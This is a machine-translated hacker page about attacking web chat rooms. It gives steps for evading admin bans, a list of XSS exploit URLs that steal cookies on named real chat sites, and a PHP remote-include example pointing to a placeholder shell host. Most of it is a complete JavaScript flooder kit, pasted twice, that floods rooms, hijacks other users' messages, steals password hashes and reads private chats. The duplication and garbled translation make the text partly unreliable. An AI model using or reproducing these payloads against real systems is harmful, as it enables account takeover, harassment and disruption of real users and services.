This page has been robot translated, sorry for typos if any. Original content here.

Chats, Schwachstellen. Codes. Überschwemmung

Umgehung von Ban

In vielen Chatrooms kann der Admin Sie auf mehreren Parametern verbieten:
- zum nick-on die Seife auf die IP-Adresse - von Comp_ID Die ersten beiden Items kosten eine Änderung von Spitznamen und Seife.


Bypass Verbot durch IP-Adresse.

1) Verlasse den Chat. 2) Löschen Sie die Cookies für diesen Chat. Schließen Sie das Browserfenster. 3) Ändern Sie die IP mit dem Proxy. 1. Ich denke, mit dem ersten Punkt werden alle ... 2. Im Browser (Internet Explorer) klicken Sie auf Extras -> Internetoptionen -> löschen "Cookies". 3. Für den Proxy verwenden Sie A4Proxy, Hide.IP.Platinum.v2.1 (suchen Sie nach neueren Versionen) und es gibt auch ein Programm, das die Browser-ID unter "Super Bane" ändert (nur bei FastBB-Foren) "AntiBan"


Umgehen des Verbots auf Comp_ID.

Zum Beispiel nehmen Sie Comp_ID: yjQVj1KUZbd45, es besteht aus 13 Zeichen (das ist immer). 1,2,3,4 Zeichen - das ist, was per Skript bei der Eingabe der Website gesendet wird, Chat, Forum und diese Charaktere ändern. Dieses Programm 9,10 Zeichen ist ein User Agent! Es ändert sich, indem man in einen anderen Browser oder durch eine Änderung in der Registry wechselt: Gehe zur Registry (start-> run-> regedit) nach diesem Abschnitt suchen: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr EntVersion \ Internet Settings \ User Agent \ Post Platform Sektion einen String-Parameter namens "Ultra-pooper Post-Plattform" und einen Wert, zB "IEAK". Und gehe zum Browser! Und Sie können diese Symbole mit Hilfe dieses Programms ändern RMOSChange 11 und 5,6,7,8 Symbole - Zeitzone. Ändern Sie die Zeitzone und alles ist ok. 12. - Tiefe der Farbe. Ändern Sie die Farbtiefe in den Bildschirmeinstellungen. 13. - die Auflösung des Bildschirms. Ändern Sie die Bildschirmauflösung.


Schwachstellen in einigen Chatrooms

  ------------------------- Vodoo CHAT ----------------------- -----
 Typ: [XSS]
 Produkt: Voodoo-Chat
 Autor: qBiN
 Ausbeutung:
 Http://site.com/chat/go.php?url=java script: alert (/ getestet% 20by% 20qBiN /);
 Die Entscheidung: Um die variable URL zu filtern, ist es auch möglich, sie auf Gültigkeit mit Hilfe von Sockets zu überprüfen.
 ------------------------------
 Typ: [XSS]
 Produkt: Voodoo-Chat
 Autor: qBiN
 Ausbeutung:
 Http: //sitename/chat/password_reminder.php? Look_for =% 3Cscript% 3Ealert (/ qBiN test /);% 3C / script% 3E
 ------------------------------
 Typ: [PHP inkl.]
 Produkt: Voodoo chat 1.0RC1b und eventuell bolier frühen Versionen.
 Quelle: xakep.ru
 Beispiel:
 Http://sitename.com/[ScriptPath]/index.php?file_path=http://SHELLURL.COM?
 ------------------------------
 Typ: FLOODER
 Produkt: Voodoo-Chat
 Autor: NaX [no] r †
 Ausbeutung: 
 Http://www.balartrating.ru/flood.zip
 ------------------------- CHAT BORODIN ----------------------- -----
 Vielleicht ist das Material ein wenig alt aber immer noch http://antichat.ru/txt/chat_borodin/ Video liegt hier http://video.antichat.net/videos/chat_borodin.rar Schwachstelle gefunden: Morph
 Geschrieben von Morph
 ------------------------- NAROD Chat ----------------------- -----
 Typ: [XSS]
 Produkt: NAROD Chat
 Autor: [sL1p]
 Exploit: Passive XSS:
 Http://www.yandex.ru/cgi-bin/customize.pl?yxqs= "> <script> alert (document.cookie) </ script>
 ------------------------- Schwachstellen bestimmter Chatrooms ----------------------- -----
 Typ: [XSS]
 Produkt: www.bazar.co.ua
 Autor: max_pain89
 Exploit: Passive XSS:
 Http://www.bazar.co.ua/?error [] = <script> bestätig (/ xxx /) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.sibchat.ru
 Autor: [sL1p], Kaban
 Exploit: Passive XSS:
 Http://www.sibchat.ru/gallery.php?sid= '> <script> alert (document.cookie) </ script> http://www.sibchat.ru/card_help.php?sid= "> < Script> alert (document.cookie) </ script> http://www.sibchat.ru/register.php?sid= "> <script> alert (document.cookie) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.chatinez.zp.ua
 Autor: [sL1p]
 Exploit: Passive XSS:
 Http://chatinet.zp.ua/winter2005/party/?001=6941337 <a>% 22% 27 "> <script> alert (document.cookie) </ script>
 Falls gewünscht 001 Kann ersetzt werden durch:
 002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016
 ------------------------------
 Typ: [XSS]
 Produkt: www.smchat.ru
 Autor: [sL1p]
 Exploit: Passive XSS:
 Http://www.smchat.ru/?key= "> <script> alert (document.cookie) </ script>
 Http://www.smchat.ru/?chatname=&key= "> <script> alert (document.cookie) </ script> 
 Http://www.smchat.ru/?ontopic=default&login= "> <script> alert (document.cookie) </ script> 
 Http://www.smchat.ru/?activate=&login= "> <script> alert (document.cookie) </ script>
 Http://www.smchat.ru/?password1=&login= "> <script> alert (document.cookie) </ script> 
 Http://www.smchat.ru/?det=default&login= "> <script> alert (document.cookie) </ script> 
 Http://www.smchat.ru/?count=1000&key= "> <script> alert (document.cookie) </ script> 
 Http://www.smchat.ru/?email=&key= "> <script> alert (document.cookie) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.chat.ru
 Autor: [sL1p]
 Exploit: Passive XSS:
 Http://www.chat.ru/user/register.html?dop10=default&confemail= "> <script> alert (document.cookie) </ script> 
 Http://www.chat.ru/user/register.html?anotherpw= "> <script> alert (document.cookie) </ script> 
 Http://www.chat.ru/user/register.html?city=&name= "> <script> alert (document.cookie) </ script> 
 Http://www.chat.ru/user/register.html?action=default&username= "> <script> alert (document.cookie) </ script> 
 Http://www.chat.ru/user/register.html?city=&year= "> <script> alert (document.cookie) </ script>
 Durch die Kombination von Abfragen können Sie viel mehr xss als in dieser Liste implementieren. 
------------------------------ Typ: [XSS] Produkt: www.krovatka.ru Autor: [sL1p], blackybr Exploit: Passive XSS: Http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8 "> <script> alert (document.cookie) </ script> Http://klubnichka.krovatka.ru/f/e.cgi?c=6&n= "> <script> alert (document.cookie)% 3B </ script> Http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn= "> <script> alert (document.cookie)% 3B </ script> Http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B</script>&ch=6&flag=0 http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script % 3E Zum Beispiel wird der Kanal klubnichka genommen, das Ändern des Namens des Kanals kann realistisch implementiert werden xss überall. ------------------------------ Typ: [XSS] Produkt: www.chatcity.ru Autor: [sL1p] Code: Http://www.ChatID.chatcity.ru/people/pp33.cgi?c=Chat ID & nn = "> <script> alert (document.cookie) </ script> Chat-ID wird durch die Chatadresse ersetzt. Sie haben alle eine digitale Bedeutung. ------------------------------


Javascript ist ein Flooder für phpmychat

Wie zu verwenden:

Chatadresse in <BASE href = "/click?http://neuch.ru/chat/">

(Sie müssen den Pfad zum Chat-Ordner angeben, manchmal chat \ chat \)

Stoppen Sie die Flut-Taste, um jede Art von Überschwemmung zu stoppen

Der Eingang aus verschiedenen Nicks Überschwemmungen wie folgt:

"User0 betritt den Raum"
"User1 betritt den Raum"
"User2 betritt den Raum"

Melden Sie sich an und überschwemmen Sie von verschiedenen Spitznamen:
Dasselbe, nur einer, der in einen Mesag eintritt,

Eingabe:
Melden Sie sich einfach in den Chat, damit Sie von einem Benutzer überfluten können
Was unterhalb der Überschrift ist Senden von Nachrichten - für Überschwemmungen von einem Benutzer

Von allen Benutzern auf IE:
Du kannst im Namen all der anderen schreiben, die auf IE sind
Weitere nützliche Features
Änderungspass
Hash mit einem Schnüffler und Login, um das Profil zu betreten, es ist nur so schnell, seinen Pass zu ändern
(Nicht mehr relevant, da der Hash überhaupt nicht benötigt wird, um den Benutzer zu ficken)

Alien Private:
Lesen Sie das Thema
Sende Skripte an die Mazilla
Für den Mozilla Browser, nur dort ist \ x3c \ x3e nicht gerollt, da ist ein besonderes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+ii=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\"> \n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE href="/click?http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> <INPUT TYPE="submit" value="Вход"> <td align=center> <INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> <INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> <form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> <form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> <FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> <INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> <font size=2 color=navy face=verdana>Отправлено&nbsp;&nbsp;&nbsp;&nbsp;<input type=text size=4>&nbsp;&nbsp;&nbsp;&nbsp;сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> <input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea> <tr> <th> <INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTML  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+ii=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\"> \n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE href="/click?http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> <INPUT TYPE="submit" value="Вход"> <td align=center> <INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> <INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> <form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> <form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> <FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> <INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> <font size=2 color=navy face=verdana>Отправлено&nbsp;&nbsp;&nbsp;&nbsp;<input type=text size=4>&nbsp;&nbsp;&nbsp;&nbsp;сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> <input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea> <tr> <th> <INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTML Speichern unter * .htm und verwenden 


IE XSS Kit



